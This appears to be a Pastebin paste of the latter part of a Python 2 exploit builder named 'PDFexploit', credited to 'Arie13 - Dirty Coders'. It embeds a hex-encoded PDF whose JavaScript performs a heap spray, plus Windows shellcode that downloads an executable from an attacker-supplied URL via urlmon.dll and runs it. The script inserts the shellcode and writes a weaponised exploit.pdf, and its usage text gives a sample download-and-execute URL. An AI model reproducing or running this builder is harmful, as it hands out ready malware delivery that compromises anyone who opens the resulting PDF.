  252.     "\x6f\x6e\x20\x66\x69\x6c\x6c\x32\x28\x29\x7b\x20\x63\x33\x33\x20"+\
  253.     "\x3d\x20\x61\x31\x31\x28\x20\x75\x72\x70\x6c\x28\x22\x25\x22\x2c"+\
  254.     "\x22\x4d\x22\x20\x2b\x20\x22\x4d\x22\x20\x2b\x20\x22\x30\x22\x20"+\
  255.     "\x2b\x20\x22\x63\x22\x20\x2b\x20\x22\x30\x22\x20\x2b\x20\x22\x63"+\
  256.     "\x22\x29\x20\x29\x3b\x63\x33\x33\x2b\x3d\x63\x33\x33\x3b\x7d\x0d"+\
  257.     "\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x33\x28"+\
  258.     "\x29\x7b\x77\x68\x69\x6c\x65\x20\x28\x63\x33\x33\x2e\x6c\x65\x6e"+\
  259.     "\x67\x74\x68\x20\x2b\x20\x32\x30\x20\x2b\x20\x38\x20\x3c\x20\x28"+\
  260.     "\x30\x78\x38\x30\x30\x30\x2b\x30\x78\x38\x30\x30\x30\x29\x29\x20"+\
  261.     "\x63\x33\x33\x2b\x3d\x63\x33\x33\x3b\x7d\x0d\x0a\x66\x75\x6e\x63"+\
  262.     "\x74\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x34\x28\x29\x7b\x64\x64\x64"+\
  263.     "\x20\x3d\x20\x63\x33\x33\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67"+\
  264.     "\x28\x30\x2c\x20\x69\x31\x2f\x32\x29\x3b\x7d\x20\x20\x20\x20\x20"+\
  265.     "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x66\x75\x6e"+\
  266.     "\x63\x74\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x35\x28\x29\x7b\x64\x64"+\
  267.     "\x64\x20\x2b\x3d\x20\x62\x32\x32\x3b\x7d\x0d\x0a\x66\x75\x6e\x63"+\
  268.     "\x74\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x36\x28\x29\x7b\x64\x64\x64"+\
  269.     "\x20\x2b\x3d\x20\x63\x33\x33\x3b\x7d\x0d\x0a\x66\x75\x6e\x63\x74"+\
  270.     "\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x37\x28\x29\x7b\x65\x65\x65\x20"+\
  271.     "\x3d\x20\x64\x64\x64\x2e\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28"+\
  272.     "\x30\x2c\x20\x69\x32\x2f\x32\x29\x3b\x7d\x20\x20\x20\x20\x20\x20"+\
  273.     "\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x66\x75\x6e\x63"+\
  274.     "\x74\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x38\x28\x29\x7b\x66\x6f\x72"+\
  275.     "\x28\x3b\x65\x65\x65\x2e\x6c\x65\x6e\x67\x74\x68\x20\x3c\x20\x30"+\
  276.     "\x78\x34\x30\x30\x30\x30\x2b\x30\x78\x34\x30\x30\x30\x30\x3b\x29"+\
  277.     "\x20\x65\x65\x65\x20\x2b\x3d\x20\x65\x65\x65\x3b\x7d\x0d\x0a\x66"+\
  278.     "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x39\x28\x29\x7b"+\
  279.     "\x66\x66\x66\x20\x3d\x20\x65\x65\x65\x2e\x73\x75\x62\x73\x74\x72"+\
  280.     "\x69\x6e\x67\x28\x30\x2c\x20\x30\x78\x38\x30\x30\x30\x30\x20\x2d"+\
  281.     "\x20\x69\x33\x29\x3b\x7d\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e"+\
  282.     "\x20\x66\x69\x6c\x6c\x31\x30\x28\x29\x7b\x67\x67\x67\x20\x3d\x20"+\
  283.     "\x6e\x65\x77\x20\x41\x72\x72\x61\x79\x28\x29\x3b\x7d\x0d\x0a\x66"+\
  284.     "\x75\x6e\x63\x74\x69\x6f\x6e\x20\x66\x69\x6c\x6c\x31\x31\x28\x29"+\
  285.     "\x7b\x66\x6f\x72\x20\x28\x68\x68\x68\x3d\x30\x3b\x68\x68\x68\x3c"+\
  286.     "\x30\x78\x31\x65\x30\x2b\x30\x78\x31\x30\x3b\x68\x68\x68\x2b\x2b"+\
  287.     "\x29\x20\x67\x67\x67\x5b\x68\x68\x68\x5d\x3d\x66\x66\x66\x2b\x22"+\
  288.     "\x73\x22\x3b\x7d\x0d\x0a\x0d\x0a\x66\x75\x6e\x63\x74\x69\x6f\x6e"+\
  289.     "\x20\x66\x69\x6c\x6c\x73\x63\x28\x29\x0d\x0a\x7b\x0d\x0a\x20\x20"+\
  290.     "\x20\x20\x62\x32\x32\x20\x3d\x20\x61\x31\x31\x28\x20\x75\x72\x70"+\
  291.     "\x6c\x28\x22\x25\x22\x2c\x27\x41\x41\x39\x30\x39\x30\x41\x41\x39"+\
  292.     "\x30\x39\x30\x41\x41\x30\x63\x30\x63\x41\x41\x30\x63\x30\x63\x41"+\
  293.     "\x41\x30\x63\x30\x63\x41\x41\x30\x63\x30\x63\x41\x41\x36\x66\x32"+\
  294.     "\x39\x41\x41\x34\x61\x38\x30\x41\x41\x30\x30\x30\x30\x41\x41\x34"+\
  295.     "\x61\x38\x61\x41\x41\x32\x31\x39\x36\x41\x41\x34\x61\x38\x30\x41"+\
  296.     "\x41\x31\x66\x39\x30\x41\x41\x34\x61\x38\x30\x41\x41\x36\x66\x32"+\
  297.     "\x39\x41\x41\x34\x61\x38\x30\x41\x41\x36\x63\x65\x66\x41\x41\x34"+\
  298.     "\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41"+\
  299.     "\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30"+\
  300.     "\x30\x41\x41\x31\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30"+\
  301.     "\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41"+\
  302.     "\x41\x30\x30\x30\x32\x41\x41\x30\x30\x30\x30\x41\x41\x30\x31\x30"+\
  303.     "\x32\x41\x41\x30\x30\x30\x30\x41\x41\x36\x66\x32\x39\x41\x41\x34"+\
  304.     "\x61\x38\x30\x41\x41\x36\x33\x61\x35\x41\x41\x34\x61\x38\x30\x41"+\
  305.     "\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41\x41\x32\x64\x62"+\
  306.     "\x32\x41\x41\x34\x61\x38\x34\x41\x41\x32\x61\x62\x31\x41\x41\x34"+\
  307.     "\x61\x38\x30\x41\x41\x30\x30\x30\x38\x41\x41\x30\x30\x30\x30\x41"+\
  308.     "\x41\x61\x38\x61\x36\x41\x41\x34\x61\x38\x30\x41\x41\x31\x66\x39"+\
  309.     "\x30\x41\x41\x34\x61\x38\x30\x41\x41\x39\x30\x33\x38\x41\x41\x34"+\
  310.     "\x61\x38\x34\x41\x41\x36\x33\x61\x35\x41\x41\x34\x61\x38\x30\x41"+\
  311.     "\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41\x41\x66\x66\x66"+\
  312.     "\x66\x41\x41\x66\x66\x66\x66\x41\x41\x36\x63\x65\x66\x41\x41\x34"+\
  313.     "\x61\x38\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41"+\
  314.     "\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x31\x41\x41\x30\x30\x30"+\
  315.     "\x30\x41\x41\x34\x61\x38\x61\x41\x41\x32\x31\x39\x36\x41\x41\x34"+\
  316.     "\x61\x38\x30\x41\x41\x31\x66\x39\x30\x41\x41\x34\x61\x38\x30\x41"+\
  317.     "\x41\x39\x30\x33\x63\x41\x41\x34\x61\x38\x34\x41\x41\x62\x36\x39"+\
  318.     "\x32\x41\x41\x34\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34"+\
  319.     "\x61\x38\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41"+\
  320.     "\x41\x30\x30\x30\x30\x41\x41\x31\x30\x30\x30\x41\x41\x30\x30\x30"+\
  321.     "\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30"+\
  322.     "\x30\x30\x30\x41\x41\x30\x30\x30\x32\x41\x41\x30\x30\x30\x30\x41"+\
  323.     "\x41\x30\x31\x30\x32\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30"+\
  324.     "\x30\x41\x41\x30\x30\x30\x30\x41\x41\x36\x33\x61\x35\x41\x41\x34"+\
  325.     "\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41"+\
  326.     "\x41\x32\x64\x62\x32\x41\x41\x34\x61\x38\x34\x41\x41\x32\x61\x62"+\
  327.     "\x31\x41\x41\x34\x61\x38\x30\x41\x41\x30\x30\x30\x38\x41\x41\x30"+\
  328.     "\x30\x30\x30\x41\x41\x61\x38\x61\x36\x41\x41\x34\x61\x38\x30\x41"+\
  329.     "\x41\x31\x66\x39\x30\x41\x41\x34\x61\x38\x30\x41\x41\x39\x30\x33"+\
  330.     "\x38\x41\x41\x34\x61\x38\x34\x41\x41\x62\x36\x39\x32\x41\x41\x34"+\
  331.     "\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41"+\
  332.     "\x41\x66\x66\x66\x66\x41\x41\x66\x66\x66\x66\x41\x41\x30\x30\x30"+\
  333.     "\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x34\x30\x41\x41\x30"+\
  334.     "\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41"+\
  335.     "\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x31\x41\x41\x30\x30\x30"+\
  336.     "\x30\x41\x41\x30\x30\x30\x30\x41\x41\x36\x33\x61\x35\x41\x41\x34"+\
  337.     "\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41"+\
  338.     "\x41\x32\x64\x62\x32\x41\x41\x34\x61\x38\x34\x41\x41\x32\x61\x62"+\
  339.     "\x31\x41\x41\x34\x61\x38\x30\x41\x41\x30\x30\x30\x38\x41\x41\x30"+\
  340.     "\x30\x30\x30\x41\x41\x61\x38\x61\x36\x41\x41\x34\x61\x38\x30\x41"+\
  341.     "\x41\x31\x66\x39\x30\x41\x41\x34\x61\x38\x30\x41\x41\x39\x30\x33"+\
  342.     "\x30\x41\x41\x34\x61\x38\x34\x41\x41\x62\x36\x39\x32\x41\x41\x34"+\
  343.     "\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41"+\
  344.     "\x41\x66\x66\x66\x66\x41\x41\x66\x66\x66\x66\x41\x41\x30\x30\x32"+\
  345.     "\x32\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30"+\
  346.     "\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x30\x41"+\
  347.     "\x41\x30\x30\x30\x30\x41\x41\x30\x30\x30\x31\x41\x41\x36\x33\x61"+\
  348.     "\x35\x41\x41\x34\x61\x38\x30\x41\x41\x30\x30\x30\x34\x41\x41\x34"+\
  349.     "\x61\x38\x61\x41\x41\x32\x31\x39\x36\x41\x41\x34\x61\x38\x30\x41"+\
  350.     "\x41\x36\x33\x61\x35\x41\x41\x34\x61\x38\x30\x41\x41\x31\x30\x36"+\
  351.     "\x34\x41\x41\x34\x61\x38\x30\x41\x41\x32\x64\x62\x32\x41\x41\x34"+\
  352.     "\x61\x38\x34\x41\x41\x32\x61\x62\x31\x41\x41\x34\x61\x38\x30\x41"+\
  353.     "\x41\x30\x30\x33\x30\x41\x41\x30\x30\x30\x30\x41\x41\x61\x38\x61"+\
  354.     "\x36\x41\x41\x34\x61\x38\x30\x41\x41\x31\x66\x39\x30\x41\x41\x34"+\
  355.     "\x61\x38\x30\x41\x41\x30\x30\x30\x34\x41\x41\x34\x61\x38\x61\x41"+\
  356.     "\x41\x61\x37\x64\x38\x41\x41\x34\x61\x38\x30\x41\x41\x36\x33\x61"+\
  357.     "\x35\x41\x41\x34\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34"+\
  358.     "\x61\x38\x30\x41\x41\x32\x64\x62\x32\x41\x41\x34\x61\x38\x34\x41"+\
  359.     "\x41\x32\x61\x62\x31\x41\x41\x34\x61\x38\x30\x41\x41\x30\x30\x32"+\
  360.     "\x30\x41\x41\x30\x30\x30\x30\x41\x41\x61\x38\x61\x36\x41\x41\x34"+\
  361.     "\x61\x38\x30\x41\x41\x36\x33\x61\x35\x41\x41\x34\x61\x38\x30\x41"+\
  362.     "\x41\x31\x30\x36\x34\x41\x41\x34\x61\x38\x30\x41\x41\x61\x65\x64"+\
  363.     "\x63\x41\x41\x34\x61\x38\x30\x41\x41\x31\x66\x39\x30\x41\x41\x34"+\
  364.     "\x61\x38\x30\x41\x41\x30\x30\x33\x34\x41\x41\x30\x30\x30\x30\x41"+\
  365.     "\x41\x64\x35\x38\x35\x41\x41\x34\x61\x38\x30\x41\x41\x36\x33\x61"+\
  366.     "\x35\x41\x41\x34\x61\x38\x30\x41\x41\x31\x30\x36\x34\x41\x41\x34"+\
  367.     "\x61\x38\x30\x41\x41\x32\x64\x62\x32\x41\x41\x34\x61\x38\x34\x41"+\
  368.     "\x41\x32\x61\x62\x31\x41\x41\x34\x61\x38\x30\x41\x41\x30\x30\x30"+\
  369.     "\x61\x41\x41\x30\x30\x30\x30\x41\x41\x61\x38\x61\x36\x41\x41\x34"+\
  370.     "\x61\x38\x30\x41\x41\x31\x66\x39\x30\x41\x41\x34\x61\x38\x30\x41"+\
  371.     "\x41\x39\x31\x37\x30\x41\x41\x34\x61\x38\x34\x41\x41\x62\x36\x39"+\
  372.     "\x32\x41\x41\x34\x61\x38\x30\x41\x41\x66\x66\x66\x66\x41\x41\x66"+\
  373.     "\x66\x66\x66\x41\x41\x66\x66\x66\x66\x41\x41\x66\x66\x66\x66\x41"+\
  374.     "\x41\x66\x66\x66\x66\x41\x41\x66\x66\x66\x66\x41\x41\x31\x30\x30"+\
  375.     "\x30\x41\x41\x30\x30\x30\x30\x41\x4e\x49\x57\x41\x59\x5f\x5f\x5f"+\
  376.     "\x43\x4f\x44\x45\x27\x29\x29\x3b\x0d\x0a\x7d\x0d\x0a\x66\x75\x6e"+\
  377.     "\x63\x74\x69\x6f\x6e\x20\x68\x65\x61\x70\x73\x70\x72\x61\x79\x28"+\
  378.     "\x64\x61\x74\x61\x29\x0d\x0a\x7b\x0d\x0a\x20\x20\x20\x20\x66\x69"+\
  379.     "\x6c\x6c\x31\x28\x64\x61\x74\x61\x29\x3b\x0a\x20\x20\x20\x20\x66"+\
  380.     "\x69\x6c\x6c\x73\x63\x28\x29\x3b\x0a\x20\x20\x20\x20\x66\x69\x6c"+\
  381.     "\x6c\x32\x28\x29\x3b\x0a\x20\x20\x20\x20\x66\x69\x6c\x6c\x33\x28"+\
  382.     "\x29\x3b\x0a\x20\x20\x20\x20\x66\x69\x6c\x6c\x34\x28\x29\x3b\x0a"+\
  383.     "\x20\x20\x20\x20\x66\x69\x6c\x6c\x35\x28\x29\x3b\x0a\x20\x20\x20"+\
  384.     "\x20\x66\x69\x6c\x6c\x36\x28\x29\x3b\x0d\x0a\x20\x20\x20\x20\x66"+\
  385.     "\x69\x6c\x6c\x37\x28\x29\x3b\x0d\x0a\x20\x20\x20\x20\x66\x69\x6c"+\
  386.     "\x6c\x38\x28\x29\x3b\x0a\x20\x20\x20\x20\x66\x69\x6c\x6c\x39\x28"+\
  387.     "\x29\x3b\x0a\x20\x20\x20\x20\x66\x69\x6c\x6c\x31\x30\x28\x29\x3b"+\
  388.     "\x0a\x20\x20\x20\x20\x66\x69\x6c\x6c\x31\x31\x28\x29\x3b\x20\x20"+\
  389.     "\x0d\x0a\x7d\x0d\x0a\x0d\x0a\x68\x65\x61\x70\x73\x70\x72\x61\x79"+\
  390.     "\x28\x75\x6e\x65\x73\x63\x61\x70\x65\x29\x3b\x0d\x0a\x0d\x0a\x73"+\
  391.     "\x70\x72\x61\x79\x28\x27\x25\x75\x34\x31\x34\x31\x27\x29\x3b\x0d"+\
  392.     "\x0a\x0d\x0a\x74\x68\x69\x73\x2e\x70\x61\x67\x65\x4e\x75\x6d\x20"+\
  393.     "\x3d\x20\x32\x3b\x0d\x0a\x0d\x0a\x20\x20\x00\x00\x0a\x65\x6e\x64"+\
  394.     "\x73\x74\x72\x65\x61\x6d\x20\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a"+\
  395.     "\x31\x32\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4c\x65"+\
  396.     "\x6e\x67\x74\x68\x20\x31\x30\x0a\x3e\x3e\x0a\x73\x74\x72\x65\x61"+\
  397.     "\x6d\x0a\x28\x42\x63\x33\x33\x63\x29\x20\x54\x6a\x0a\x65\x6e\x64"+\
  398.     "\x73\x74\x72\x65\x61\x6d\x20\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x0a"+\
  399.     "\x31\x35\x20\x30\x20\x6f\x62\x6a\x20\x0a\x3c\x3c\x0a\x2f\x4c\x65"+\
  400.     "\x6e\x67\x74\x68\x20\x31\x30\x0a\x3e\x3e\x0a\x73\x74\x72\x65\x61"+\
  401.     "\x6d\x0a\x28\x42\x63\x33\x33\x63\x29\x20\x54\x6a\x0a\x65\x6e\x64"+\
  402.     "\x73\x74\x72\x65\x61\x6d\x20\x0a\x65\x6e\x64\x6f\x62\x6a\x20\x78"+\
  403.     "\x72\x65\x66\x0a\x30\x20\x31\x37\x0a\x30\x30\x30\x30\x30\x30\x30"+\
  404.     "\x30\x30\x30\x20\x36\x35\x35\x33\x35\x20\x66\x20\x0a\x30\x30\x30"+\
  405.     "\x30\x30\x30\x30\x30\x31\x35\x20\x30\x30\x30\x30\x30\x20\x6e\x20"+\
  406.     "\x0a\x30\x30\x30\x30\x30\x30\x31\x31\x33\x39\x20\x30\x30\x30\x30"+\
  407.     "\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x30\x31\x31\x37\x33\x20"+\
  408.     "\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x30\x31"+\
  409.     "\x32\x37\x34\x20\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x30\x30\x30"+\
  410.     "\x30\x30\x30\x33\x33\x39\x33\x20\x30\x30\x30\x30\x30\x20\x6e\x20"+\
  411.     "\x0a\x30\x30\x30\x30\x30\x30\x31\x33\x32\x32\x20\x30\x30\x30\x30"+\
  412.     "\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x30\x33\x32\x36\x38\x20"+\
  413.     "\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x30\x31"+\
  414.     "\x34\x39\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x30\x30\x30"+\
  415.     "\x30\x30\x30\x33\x31\x32\x36\x20\x30\x30\x30\x30\x30\x20\x6e\x20"+\
  416.     "\x0a\x30\x30\x30\x30\x30\x30\x31\x33\x39\x33\x20\x30\x30\x30\x30"+\
  417.     "\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x30\x31\x34\x35\x37\x20"+\
  418.     "\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x31\x34"+\
  419.     "\x34\x34\x37\x20\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x30\x30\x30"+\
  420.     "\x30\x30\x30\x31\x36\x32\x32\x20\x30\x30\x30\x30\x30\x20\x6e\x20"+\
  421.     "\x0a\x30\x30\x30\x30\x30\x30\x32\x39\x37\x30\x20\x30\x30\x30\x30"+\
  422.     "\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x31\x34\x35\x31\x31\x20"+\
  423.     "\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x30\x30\x30\x30\x30\x30\x33"+\
  424.     "\x34\x34\x32\x20\x30\x30\x30\x30\x30\x20\x6e\x20\x0a\x74\x72\x61"+\
  425.     "\x69\x6c\x65\x72\x0a\x0a\x3c\x3c\x0a\x2f\x52\x6f\x6f\x74\x20\x33"+\
  426.     "\x20\x30\x20\x52\x0a\x2f\x53\x69\x7a\x65\x20\x31\x37\x0a\x3e\x3e"+\
  427.     "\x0a\x73\x74\x61\x72\x74\x78\x72\x65\x66\x0a\x31\x34\x35\x37\x34"+\
  428.     "\x0a\x25\x25\x45\x4f\x46\x0a";
  429.  
  430. shellcode=\
  431.     "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03"+\
  432.     "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74"+\
  433.     "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E"+\
  434.     "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03"+\
  435.     "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C"+\
  436.     "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40"+\
  437.     "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C"+\
  438.     "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC"+\
  439.     "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F"+\
  440.     "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB"+\
  441.     "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83"+\
  442.     "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF"+\
  443.     "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF"+\
  444.     "ANIWAY_URL\x00";
  445.  
  446. def covertShellcode (data):
  447.  
  448.  
  449.     arr=list( data + "\x90" * ( len(data) % 2 ))
  450.  
  451.     converted=""
  452.     for i in range(0, len(arr)/2 ):
  453.         converted += "\x41\x41" + arr[i * 2 +1].encode('hex') + arr[i*2].encode('hex')
  454.  
  455.     return converted
  456.  
  457.    
  458. def main(URL, pdfFile, cLevel):
  459.  
  460.     try:
  461.         output=open(pdfFile, "wb")
  462.     except:
  463.         print "Error opening output file: %s"%pdfFile
  464.  
  465.     sc = re.sub(r'ANIWAY_URL', URL, shellcode)
  466.  
  467.     sc = covertShellcode(sc)
  468.  
  469.     filePart1  = opdf[0:0x96D]
  470.     script = opdf[0x96d:0x177c]
  471.     filePart2  = opdf[0x177c:]
  472.     script = re.sub(r'ANIWAY___CODE', sc, script)
  473.     deflated_script = zlib.compress(script, cLevel);
  474.     script_desc    = str(len(deflated_script)) + ' /Filter /FlateDecode '
  475.     filePart1 = re.sub(r'ANIWAY_____LEN', script_desc, filePart1)
  476.     file = filePart1 + deflated_script + filePart2;
  477.  
  478.     output.write(file)
  479.     print "Crafted PDF file created successfully: %s"%pdfFile
  480.  
  481. if __name__ == "__main__":
  482.     if len(sys.argv) < 2 :
  483.         print  "\t######################################################################"
  484.     print  "\t# PDFexploit                                                         #"
  485.     print  "\t# ================================================================== #"                                          
  486.         print  "\t#   ___ ___        .__  .__                                     __   #"
  487.         print  "\t#  /   |   \ ____ |  | |  | ___.__. ___________ ___.__._______/  |_ #"
  488.         print  "\t# /    ~    \/  _ \|  | |  |<   |  |/ ___\_  __ <   |  |\____ \  __\#"
  489.         print  "\t# \   Y    (  <_> )  |_|  |_\___  \ \___|  | \/\___  ||  |_> >  |  #"  
  490.         print  "\t#  \___|_  / \____/|____/____/ ____|\___  >__|   / ____||   __/|__|  #"
  491.         print  "\t#        \/                  \/         \/       \/     |__|         #"
  492.     print  "\t# made by: Arie13                                                    #"
  493.     print  "\t# -Dirty Coders                                                      #"
  494.     print  "\t#                                                                    #"
  495.     print  "\t######################################################################"
  496.         print("\nPerintah : %s <download&execute URL>"%sys.argv[0])
  497.         print("\nContoh   : %s http://contoh.com/folder/alone.exe\n"%sys.argv[0])
  498.         print "\nHasil Output file default : exploit.pdf"
  499.         sys.exit(-1)
  500.  
  501.     URL=sys.argv[1]
  502.  
  503.     if len(sys.argv) > 2:
  504.        filename=sys.argv[2]
  505.     else:
  506.        filename="exploit.pdf"
  507.  
  508.  
  509.  
  510.  
  511.     CompressLevel=1
  512.     main(URL, filename, CompressLevel)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!